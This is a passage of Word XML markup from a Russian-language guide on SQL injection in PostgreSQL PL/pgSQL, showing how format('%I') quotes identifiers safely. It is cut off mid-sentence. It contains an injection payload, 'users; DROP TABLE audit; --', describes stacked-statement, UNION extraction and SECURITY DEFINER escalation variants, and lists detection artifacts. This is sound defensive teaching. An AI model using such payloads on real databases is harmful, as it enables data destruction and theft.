    <w:p w14:paraId="602610DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ исполняется sequentially: SELECT, потом DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F61C8E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ result SELECT возвращается в INTO result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55640401" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Защита — `%I`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA70E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_count(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA4641" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS bigint LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5FAA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E1770" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result bigint;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F5E8D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF29969" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- ПРАВИЛЬНО: %I для identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF41D0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('SELECT COUNT(*) FROM %I', tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B2F46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B216912" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC8ACCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A4FCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'users; DROP TABLE audit; --'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> теперь подставляется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>quoted identifier</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F433B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT COUNT(*) FROM "users; DROP TABLE audit; --"';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71705E20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ всё внутри "" — одно identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED7D461" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ Postgres ищет таблицу с таким именем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB76AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ ERROR: relation "users; DROP TABLE audit; --" does not exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204211D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оборачивает значение в double-quotes и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>удваивает внутренние `"`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — payload остаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>одной строкой имени таблицы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, любые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>/специальные символы внутри становятся частью identifier. Injection физически невозможна.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137728B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для schema-qualified имён (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema.table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>отдельная пара `%I`-вызовов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или предварительный split:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61730E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Когда tbl_name может быть "schema.table"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E87CEFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT COUNT(*) FROM %I.%I', schema_name, table_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C466E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I.%I', 'sch', 'tbl')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"sch"."tbl"</w:t>
      </w:r>
      <w:r>
        <w:t>. Если split не делать (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', 'sch.tbl')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Postgres интерпретирует весь string как одно имя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"sch.tbl"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не равно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sch.tbl</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6BC4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — RCE/destructive operation через stacked statements внутри EXECUTE. Variant B — extraction скрытых данных через UNION в SELECT-form. Если функция SECURITY DEFINER и owner = superuser, payload эскалирует до full DBA-level operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132EE14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E444C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t>: SQL-statements от owner функции, не от caller (потому что SECURITY DEFINER переключает current_user). DROP/INSERT/CREATE от superuser-owned функции, вызванной обычной ролью — критичный сигнал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EE254" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с длинными подозрительными именами — индикатор failed identifier injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AD8329" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = ddl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = mod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: DROP/INSERT внутри EXECUTE в plpgsql-функции при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уровне above none — будут логироваться.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358DA326" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в plpgsql:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B8A7D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Парсит SQL-string sequentially</w:t>
      </w:r>
      <w:r>
        <w:t>. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PL/pgSQL - Executing Dynamic Commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): *"The string expression must yield a string containing SQL commands... If the command returns rows... result can be assigned to a record or row variable."* В отличие от Wire Protocol simple/extended-режимов (3.5), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в plpgsql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всегда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрабатывает text-SQL и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всегда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> допускает multi-statement через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не protocol-mode-dependent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fixed behavior plpgsql executor</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680AF3E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`format('%s', x)` подставляет x как plain string</w:t>
      </w:r>
      <w:r>
        <w:t>. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t>): *"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> formats the argument value as a simple string. A null value is treated as an empty string."* Никакого quoting нет — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C-printf-стиль</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это design-decision: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая string substitution, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — identifier-specific, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — literal-specific.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C1C92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`%I` правильно обрабатывает идентификаторы</w:t>
      </w:r>
      <w:r>
        <w:t>. Документация: *"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> treats the argument value as an SQL identifier, double-quoting it if necessary. It is an error for the value to be null (equivalent to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)."* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функциональные эквиваленты; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чуть удобнее в format-string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820C83C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Корень ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — путаница в семантике </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
